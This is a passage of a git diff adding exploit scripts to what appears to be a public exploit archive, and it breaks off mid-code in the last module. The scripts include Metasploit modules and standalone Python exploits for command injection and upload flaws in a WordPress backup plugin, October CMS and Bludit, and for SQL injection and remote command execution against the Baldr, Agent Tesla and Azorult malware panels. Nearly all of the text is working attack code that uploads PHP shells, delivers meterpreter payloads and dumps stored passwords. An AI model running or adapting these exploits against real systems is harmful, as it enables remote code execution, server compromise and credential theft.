+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+
+    if upload_shell(true)
+      print_good("Upload successfully.")
+      exec(@shell)
+    end
+  end
+
+  def check
+
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_fille.php")
+    })
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    if res && res.code == 200 && res.body =~ /upload_fille.php/
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/remote/47187.rb b/exploits/php/remote/47187.rb
new file mode 100755
index 000000000..5356b4ab3
--- /dev/null
+++ b/exploits/php/remote/47187.rb
@@ -0,0 +1,194 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WP Database Backup RCE',
+      'Description'    => %q(
+        There exists a command injection vulnerability in the Wordpress plugin
+        `wp-database-backup` for versions < 5.2.
+
+        For the backup functionality, the plugin generates a `mysqldump` command
+        to execute. The user can choose specific tables to exclude from the backup
+        by setting the `wp_db_exclude_table` parameter in a POST request to the
+        `wp-database-backup` page. The names of the excluded tables are included in
+        the `mysqldump` command unsanitized. Arbitrary commands injected through the
+        `wp_db_exclude_table` parameter are executed each time the functionality
+        for creating a new database backup are run.
+
+        Authentication is required to successfully exploit this vulnerability.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Mikey Veenstra / Wordfence',  # Vulnerability Discovery
+        'Shelby Pace'                  # Metasploit module
+      ],
+      'References'     =>
+        [
+          [ 'URL', 'https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/' ],
+        ],
+      'Platform'       => [ 'win', 'linux' ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+        [
+          [
+            'Windows',
+            {
+              'Platform'        => 'win',
+              'Arch'            => [ ARCH_X86, ARCH_X64 ]
+            }
+          ],
+          [
+            'Linux',
+            {
+              'Platform'        =>  'linux',
+              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
+              'CmdStagerFlavor' =>  'printf'
+            }
+          ]
+        ],
+      'DisclosureDate' => '2019-04-24',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+    [
+      OptString.new('USERNAME', [ true, 'Wordpress username', '' ]),
+      OptString.new('PASSWORD', [ true, 'Wordpress password', '' ]),
+      OptString.new('TARGETURI', [ true, 'Base path to Wordpress installation', '/' ])
+    ])
+  end
+
+  def check
+    return CheckCode::Unknown unless wordpress_and_online?
+
+    changelog_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-database-backup', 'readme.txt')
+    res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  changelog_uri
+    )
+
+    if res && res.code == 200
+      version = res.body.match(/=+\s(\d+\.\d+)\.?\d*\s=/)
+      return CheckCode::Detected unless version && version.length > 1
+
+      vprint_status("Version of wp-database-backup detected: #{version[1]}")
+      return CheckCode::Appears if Gem::Version.new(version[1]) < Gem::Version.new('5.2')
+    end
+    CheckCode::Safe
+  end
+
+  def exploit
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+    fail_with(Failure::NoAccess, 'Unable to log into Wordpress') unless cookie
+
+    res = create_exclude_table(cookie)
+    nonce = get_nonce(res)
+    create_backup(cookie, nonce)
+
+    clear_exclude_table(cookie)
+  end
+
+  def create_exclude_table(cookie)
+    @exclude_uri = normalize_uri(target_uri.path, 'wp-admin', 'tools.php')
+    res = send_request_cgi(
+      'method'    =>  'GET',
+      'uri'       =>  @exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_get'  =>  { 'page'  =>  'wp-database-backup' }
+    )
+
+    fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200
+    print_good('Reached the wp-database-backup settings page')
+    if datastore['TARGET'] == 1
+      comm_payload = generate_cmdstager(concat_operator: ' && ', temp: './')
+      comm_payload = comm_payload.join('&&')
+      comm_payload = comm_payload.gsub('\'', '')
+      comm_payload = "; #{comm_payload} ;"
+    else
+      comm_payload = " & #{cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true, encode_final_payload: true)} & ::"
+    end
+
+    table_res = send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  @exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_post' =>
+      {
+        'wpsetting'                       =>  'Save',
+        'wp_db_exclude_table[wp_comment]' =>  comm_payload
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to submit payload as an excluded table') unless table_res && table_res.code
+    print_good('Successfully added payload as an excluded table')
+
+    res.get_html_document
+  end
+
+  def get_nonce(response)
+    fail_with(Failure::UnexpectedReply, 'Failed to get a proper response') unless response
+
+    div_res = response.at('p[@class="submit"]')
+    fail_with(Failure::NotFound, 'Failed to find the element containing the nonce') unless div_res
+
+    wpnonce = div_res.to_s.match(/_wpnonce=([0-9a-z]*)/)
+    fail_with(Failure::NotFound, 'Failed to retrieve the wpnonce') unless wpnonce && wpnonce.length > 1
+
+    wpnonce[1]
+  end
+
+  def create_backup(cookie, nonce)
+    first_res = send_request_cgi(
+      'method'    =>  'GET',
+      'uri'       =>  @exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_get'  =>
+      {
+        'page'      =>  'wp-database-backup',
+        '_wpnonce'  =>  nonce,
+        'action'    =>  'createdbbackup'
+      }
+    )
+
+    res = send_request_cgi(
+      'method'    =>  'GET',
+      'uri'       =>  @exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_get'  =>
+      {
+        'page'          =>  'wp-database-backup',
+        'notification'  =>  'create'
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to create database backup') unless res && res.code == 200 && res.body.include?('Database Backup Created Successfully')
+    print_good('Successfully created a backup of the database')
+  end
+
+  def clear_exclude_table(cookie)
+    res = send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  @exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_post' =>
+      {
+        'wpsetting'                       =>  'Save',
+        'wp_db_exclude_table[wp_comment]' =>  'wp_comment'
+      }
+    )
+
+   fail_with(Failure::UnexpectedReply, 'Failed to delete the remove the payload from the excluded tables') unless res && res.code == 200
+   print_good('Successfully deleted the payload from the excluded tables list')
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/remote/47215.rb b/exploits/php/remote/47215.rb
new file mode 100755
index 000000000..993fc83d3
--- /dev/null
+++ b/exploits/php/remote/47215.rb
@@ -0,0 +1,242 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'net/http'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Baldr Botnet Panel Shell Upload Exploit",
+      'Description'    => %q{
+        This module exploits the file upload vulnerability of baldr malware panel.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Ege Balcı <ege.balci@invictuseurope.com>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://prodaft.com']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => false,
+          'WfsDelay' => 5,
+        },
+      'Platform'       => ['php'],
+      'Arch'           => [ ARCH_PHP],
+      'Targets'        =>
+        [
+          ['Auto',
+            {
+              'Platform' => 'PHP',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
+            }
+          ],
+          ['Baldr <= v2.0',
+            {
+              'Platform' => 'PHP',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
+            }
+          ],
+          ['Baldr v2.2',
+            {
+              'Platform' => 'PHP',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
+            }
+          ],
+          ['Baldr v3.0 & v3.1',
+            {
+              'Platform' => 'PHP',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Dec 19 2018",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the baldr gate', '/']),
+      ]
+    )
+  end
+
+  def check 
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path,"/gate.php")
+    )
+
+    ver = ''
+
+    if res.code == 200
+      if res.body.include?('~;~')
+        targets[3] = targets[0]
+        #target = targets[3]
+        ver = '>= v3.0'
+      elsif res.body.include?(';')
+        #target = targets[2]
+        targets[2] = targets[0]
+        ver = 'v2.2'
+      elsif res.body.size < 4
+        targets[1] = targets[0]
+        #target = targets[1]
+        ver = '<= v2.0'
+      else
+        Exploit::CheckCode::Safe  
+      end
+      print_status("Baldr verison: #{ver}")
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+
+    name = '.'+Rex::Text.rand_text_alpha(4)
+    files =
+    [
+      {data: payload.encoded, fname: "#{name}.php"}
+    ]
+    zip = Msf::Util::EXE.to_zip(files) 
+    hwid = Rex::Text.rand_text_alpha(8).upcase
+
+    if targets[0]
+      check
+    end
+
+
+    case target
+    when targets[3]
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path,"/gate.php")}
+      )
+      key = res.body.to_s.split('~;~')[0]
+      print_good("Key: #{key}")
+
+      data = "hwid=#{hwid}&os=Windows 10 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v3.0"
+      data = xor(data,key)
+
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path,"/gate.php"),
+        'data'  => data.to_s
+        }
+      )
+
+      if res.code == 200
+        print_good("Bot successfully registered.")
+      else
+        print_error("New bot register failed !")
+        return false
+      end
+
+      data = xor(zip.to_s,key)
+      form = Rex::MIME::Message.new
+      form.add_part(data.to_s, 'application/octet-stream', 'binary', "form-data; name=\"file\"; filename=\"file.zip\"")
+
+      res = send_request_cgi(
+        'method'    => 'POST',
+        'uri'       => normalize_uri(target_uri.path,"/gate.php"),
+        'ctype'     => "multipart/form-data; boundary=#{form.bound}",
+        'data'      => form.to_s
+      )
+      if res && (res.code == 200 ||res.code == 100)
+        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
+      else
+        print_error("Server responded with code #{res.code}") if res
+        print_error("Failed to upload payload.")
+        return false
+      end
+
+    when targets[2]
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path,"/gate.php")}
+      )
+      key = res.body.to_s.split(';')[0]
+      print_good("Key: #{key}")
+      data = "hwid=#{hwid}&os=Windows 7 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v2.2***"
+      data << zip.to_s
+      
+      result = ""
+      codepoints = data.each_codepoint.to_a
+      codepoints.each_index do |i|
+          result += (codepoints[i] ^ key[i % key.size].ord).chr
+      end
+
+      res = send_request_cgi(
+        'method'    => 'POST',
+        'uri'       => normalize_uri(target_uri.path,"/gate.php"),
+        'data'      => result.to_s
+      )
+      if res && (res.code == 200 ||res.code == 100)
+        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
+      else
+        print_error("Server responded with code #{res.code}") if res
+        print_error("Failed to upload payload.")
+        return false
+      end
+    else
+      res = send_request_cgi(
+        'method'    => 'POST',
+        'uri'       => normalize_uri(target_uri.path,"/gate.php"),
+        'data'      => zip.to_s,
+        'encode_params' => true,
+        'vars_get'  => {
+          'hwid'  => hwid,
+          'os'  => 'Windows 7 x64',
+          'cookie'  => '0',
+          'pswd'  => '0',
+          'credit'  => '0',
+          'wallet'  => '0',
+          'file'  => '1',
+          'autofill'  => '0',
+          'version'  => 'v2.0'
+        }
+      )
+
+      if res && (res.code == 200 ||res.code == 100)
+        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
+      else
+        print_error("Server responded with code #{res.code}") if res
+        print_error("Failed to upload payload.")
+        return false
+      end
+    end
+
+
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path,"/logs/#{hwid}/#{name}.php")}, 3
+    )
+    
+    print_good("Payload successfully triggered !")
+  end
+
+  def xor(data, key)
+    result = ""
+    codepoints = data.each_codepoint.to_a
+    codepoints.each_index do |i|
+        result += (codepoints[i] ^ key[i % key.size].ord).chr
+    end
+    return result
+  end
+
+
+end
\ No newline at end of file
diff --git a/exploits/php/remote/47243.py b/exploits/php/remote/47243.py
new file mode 100755
index 000000000..347457005
--- /dev/null
+++ b/exploits/php/remote/47243.py
@@ -0,0 +1,54 @@
+import requests
+import argparse
+import base64
+
+# Agent Tesla C2 RCE by prsecurity
+# For research purposes only. Don't pwn what you don't own.
+
+def get_args():
+	parser = argparse.ArgumentParser(
+		prog="agent_tesla_sploit.py",
+		formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
+		epilog= '''
+		This script will exploit the RCE/SQL vulnerability in Agent Tesla Dashboard.
+		''')
+	parser.add_argument("target", help="URL of WebPanel (ex: http://target.com/WebPanel/)")
+	parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
+	parser.add_argument("-p", "--proxy", default="socks5://localhost:9150", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)")
+	args = parser.parse_args()
+	return args
+
+def pwn_target(target, command, proxy):
+	requests.packages.urllib3.disable_warnings()
+	proxies = {'http': proxy, 'https': proxy}
+	print('[*] Probing...')
+	get_params = {
+		'table':'screens', 
+		'primary':'HWID', 
+		'clmns':'a:1:{i:0;a:3:{s:2:"db";s:4:"HWID";s:2:"dt";s:4:"HWID";s:9:"formatter";s:4:"exec";}}', 
+		'where': base64.b64encode("1=1 UNION SELECT \"{}\"".format(command).encode('utf-8'))
+	}
+	target = target + '/server_side/scripts/server_processing.php'
+	try:
+		r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
+		print("[*] Your IP: {}".format(r.text))
+		headers = {
+			"User-agent":"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
+		}
+		r = requests.get(target, params=get_params, headers=headers, verify=False, proxies=proxies)
+		result = r.json()['data'][-1]['HWID']
+		print('[+] {}'.format(result))
+	except:
+		print("[-] ERROR: Something went wrong.")
+		print(r.text)
+		raise
+
+def main():
+	print ()
+	print ('Agent Tesla RCE by prsecurity.')
+	args = get_args()
+	pwn_target(args.target.strip(), args.command.strip(), args.proxy.strip())
+
+
+if __name__ == '__main__':
+	main()
\ No newline at end of file
diff --git a/exploits/php/remote/47244.py b/exploits/php/remote/47244.py
new file mode 100755
index 000000000..a9de00a79
--- /dev/null
+++ b/exploits/php/remote/47244.py
@@ -0,0 +1,95 @@
+import requests
+import argparse
+import base64
+
+# Azorult 3.3.1 C2 SQLi by prsecurity
+# For research purposes only. Don't pwn what you don't own.
+# change GUID and XOR key to specific beacon, can be extracted from a sample
+
+guid = "353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F"
+key = "\x03\x55\xae"
+
+def get_args():
+	parser = argparse.ArgumentParser(
+		prog="azorult_sploit.py",
+		formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
+		epilog= '''
+		This script will exploit the SQL vulnerability in Azorult 3.3.1 Dashboard.
+		''')
+	parser.add_argument("target", help="URL of index.php (ex: http://target.com/index.php)")
+	parser.add_argument("-n", "--id_record", default="1", help="id of record to dump")
+	parser.add_argument("-p", "--proxy", default="http://localhost:8080", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)")
+	args = parser.parse_args()
+	return args
+
+def CB_XORm(data, key):
+    j=0
+    key = list(key)
+    data = list(data)
+    tmp = list()
+    for i in range(len(data)):
+        tmp.append(chr(ord(data[i])^ord(key[j])))
+        j += 1
+        if j > (len(key)-1):
+            j = 0
+    return "".join(tmp)
+
+def pwn_target(target, num_records, proxy):
+	requests.packages.urllib3.disable_warnings()
+	proxies = {'http': proxy, 'https': proxy}
+	
+	try:
+		r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
+		print("[*] Your IP: {}".format(r.text))
+		headers = {
+			"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
+		}
+		print('[+] Getting URL, LOGIN AND PASS')
+		data = [
+		    "|".join([
+		        "1","2","3","4","5","6","7","8","9","10","11","12"
+		    ]),
+		    "\r\n".join([
+		        "|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p2) from passwords limit {},1) dumb),333,4,5,6,7), (111,(select * from (select concat({},0x3a,p_p3) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records,num_records, num_records)])
+		    ]),
+		    "c",
+		    "d",
+		    ":".join(["'11","22"])
+		]
+		payload = CB_XORm(guid.join(data), key)
+		r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies)
+		if r.text != "OK":
+			print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?")
+			raise
+		print('[+] Getting LOGIN/PASS')
+		data = [
+		    "|".join([
+		        "1","2","3","4","5","6","7","8","9","10","11","12"
+		    ]),
+		    "\r\n".join([
+		        "|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p1) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records)])
+		    ]),
+		    "c",
+		    "d",
+		    ":".join(["'11","22"])
+		]
+		payload = CB_XORm(guid.join(data), key)
+		r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies)
+		if r.text != "OK":
+			print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?")
+			raise
+		print('[+] If this worked, you will see two new records in password table at guest.php')
+	except:
+		print("[-] ERROR: Something went wrong.")
+		print(r.text)
+		raise
+
+def main():
+	print ()
+	print ('Azorult 3.3.1 SQLi by prsecurity')
+	args = get_args()
+	pwn_target(args.target.strip(), args.num_records.strip(), args.proxy.strip())
+
+
+if __name__ == '__main__':
+	main()
\ No newline at end of file
diff --git a/exploits/php/remote/47256.rb b/exploits/php/remote/47256.rb
new file mode 100755
index 000000000..abc65cbe0
--- /dev/null
+++ b/exploits/php/remote/47256.rb
@@ -0,0 +1,106 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Tesla Agent Remote Code Execution",
+      'Description'    => %q{
+        This module exploits the command injection vulnerability of tesla agent botnet panel.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Ege Balcı <ege.balci@invictuseurope.com>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://prodaft.com']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => false,
+          'WfsDelay' => 5,
+        },
+      'Platform'       => ['php'],
+      'Arch'           => [ ARCH_PHP ],
+      'Targets'        =>
+      [
+        ['PHP payload',
+          {
+            'Platform' => 'PHP',
+            'Arch' => ARCH_PHP,
+            'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
+          }
+        ]
+      ],
+      'Privileged'     => false,
+      'DisclosureDate' => "July 10 2018",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/server_side/scripts/server_processing.php'),
+    )
+    #print_status(res.body)
+    if res && res.body.include?('SQLSTATE')
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    check
+
+    name = '.'+Rex::Text.rand_text_alpha(4)+'.php'
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path,'/server_side/scripts/server_processing.php'),
+      'encode_params' => true,
+      'vars_get'  => {
+        'table'  => 'passwords',
+        'primary'  => 'password_id',
+        'clmns'  => 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}',
+        'where'  => Rex::Text.encode_base64("1=1 UNION SELECT \"echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d > #{name}\"")
+      }
+    )
+
+    if res && res.code == 200 && res.body.include?('recordsTotal')
+      print_good("Payload uploaded as #{name}")  
+    else
+      print_error('Payload upload failed :(')
+      Msf::Exploit::Failed
+    end
+
+    
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path,'/server_side/scripts/',name)}, 5
+    )
+    
+    if res && res.code == 200
+      print_good("Payload successfully triggered !")  
+    else
+      print_error('Payload trigger failed :(')
+      Msf::Exploit::Failed
+    end
+    
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/remote/47376.rb b/exploits/php/remote/47376.rb
new file mode 100755
index 000000000..48047c147
--- /dev/null
+++ b/exploits/php/remote/47376.rb
@@ -0,0 +1,157 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'October CMS Upload Protection Bypass Code Execution',
+      'Description' => %q{
+          This module exploits an Authenticated user with permission to upload and manage media contents can
+          upload various files on the server. Application prevents the user from
+          uploading PHP code by checking the file extension. It uses black-list based
+          approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
+          Definitions.php:blockedExtensions().
+          This module was tested on October CMS version v1.0.412 on Ubuntu.
+      },
+      'Author' =>
+        [
+          'Anti Räis', # Discovery
+          'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module
+          'SecureLayer7.net' # Metasploit Module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['EDB','41936'],
+          ['URL','https://bitflipper.eu/finding/2017/04/october-cms-v10412-several-issues.html'],
+          ['CVE','2017-1000119']
+        ],
+      'DefaultOptions' =>
+        {
+          'SSL'     => false,
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+          'ENCODER' => 'php/base64',
+        },
+      'Privileged' => false,
+      'Platform'   => ['php'],
+      'Arch'       => ARCH_PHP,
+      'Targets' =>
+        [
+          [ 'October CMS v1.0.412', { } ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 25 2017'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "Base October CMS directory path", '/']),
+        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
+        OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin'])
+      ])
+  end
+
+  def uri
+    return target_uri.path
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(uri, 'modules', 'system', 'assets', 'js', 'framework.js')
+      })
+    rescue
+      vprint_error('Unable to access the /assets/js/framework.js file')
+      return CheckCode::Unknown
+    end
+
+    if res && res.code == 200
+      return Exploit::CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def login
+    res = send_request_cgi({
+      'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'),
+      'method' => 'GET'
+    })
+
+    if res.nil?
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+    end
+
+    /name="_session_key" type="hidden" value="(?<session>[A-Za-z0-9"]+)">/ =~ res.body
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine Session Key") if session.nil?
+
+    /name="_token" type="hidden" value="(?<token>[A-Za-z0-9"]+)">/ =~ res.body
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine token") if token.nil?
+    vprint_good("Token for login : #{token}")
+    vprint_good("Session Key for login : #{session}")
+
+    cookies = res.get_cookies
+    vprint_status('Trying to Login ......')
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'),
+      'cookie' => cookies,
+      'vars_post' => Hash[{
+        '_session_key' => session,
+        '_token' => token,
+        'postback' => '1',
+        'login' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }.to_a.shuffle]
+    })
+
+    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
+
+    # if we redirect. then we assume we have authenticated cookie.
+    if res.code == 302
+      print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+      store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+      return cookies
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
+    end
+  end
+
+
+  def exploit
+    cookies = login
+
+    evil = "<?php #{payload.encoded} ?>"
+    payload_name = "#{rand_text_alpha(8..13)}.php5"
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part("/", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="path"')
+    post_data.add_part(evil, content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file_data\"; filename=\"#{payload_name}")  #payload
+    data = post_data.to_s
+
+    register_files_for_cleanup(payload_name)
+    vprint_status("Trying to upload malicious #{payload_name} file ....")
+    res = send_request_cgi({
+      'uri' => normalize_uri(uri, 'backend', 'cms', 'media'),
+      'method' => 'POST',
+      'cookie' => cookies,
+      'headers' => { 'X-OCTOBER-FILEUPLOAD' => 'MediaManager-manager' },
+      'Connection' => 'close',
+      'data' => data,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+    })
+
+    send_request_cgi({
+      'uri' => normalize_uri(uri, 'storage', 'app', 'media', payload_name),
+      'method' => 'GET'
+    })
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/remote/47699.rb b/exploits/php/remote/47699.rb
new file mode 100755
index 000000000..378f1fab2
--- /dev/null
+++ b/exploits/php/remote/47699.rb
@@ -0,0 +1,262 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+  include Msf::Exploit::FileDropper
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Bludit Directory Traversal Image File Upload Vulnerability",
+      'Description'    => %q{
+        This module exploits a vulnerability in Bludit. A remote user could abuse the uuid
+        parameter in the image upload feature in order to save a malicious payload anywhere
+        onto the server, and then use a custom .htaccess file to bypass the file extension
+        check to finally get remote code execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'christasa', # Original discovery
+          'sinn3r'     # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2019-16113'],
+          ['URL', 'https://github.com/bludit/bludit/issues/1081'],
+          ['URL', 'https://github.com/bludit/bludit/commit/a9640ff6b5f2c0fa770ad7758daf24fec6fbf3f5#diff-6f5ea518e6fc98fb4c16830bbf9f5dac' ]
+        ],
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Notes'          =>
+        {
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'Targets'        =>
+        [
+          [ 'Bludit v3.9.2', {} ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "2019-09-07",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for Bludit', '/']),
+        OptString.new('BLUDITUSER', [true, 'The username for Bludit']),
+        OptString.new('BLUDITPASS', [true, 'The password for Bludit'])
+      ])
+  end
+
+  class PhpPayload
+    attr_reader :payload
+    attr_reader :name
+
+    def initialize(p)
+      @payload = p
+      @name = "#{Rex::Text.rand_text_alpha(10)}.png"
+    end
+  end
+
+  class LoginBadge
+    attr_reader   :username
+    attr_reader   :password
+    attr_accessor :csrf_token
+    attr_accessor :bludit_key
+
+    def initialize(user, pass, token, key)
+      @username = user
+      @password = pass
+      @csrf_token = token
+      @bludit_key = key
+    end
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'index.php')
+    })
+
+    unless res
+      vprint_error('Connection timed out')
+      return CheckCode::Unknown
+    end
+
+    html = res.get_html_document
+    generator_tag = html.at('meta[@name="generator"]')
+    unless generator_tag
+      vprint_error('No generator metadata tag found in HTML')
+      return CheckCode::Safe
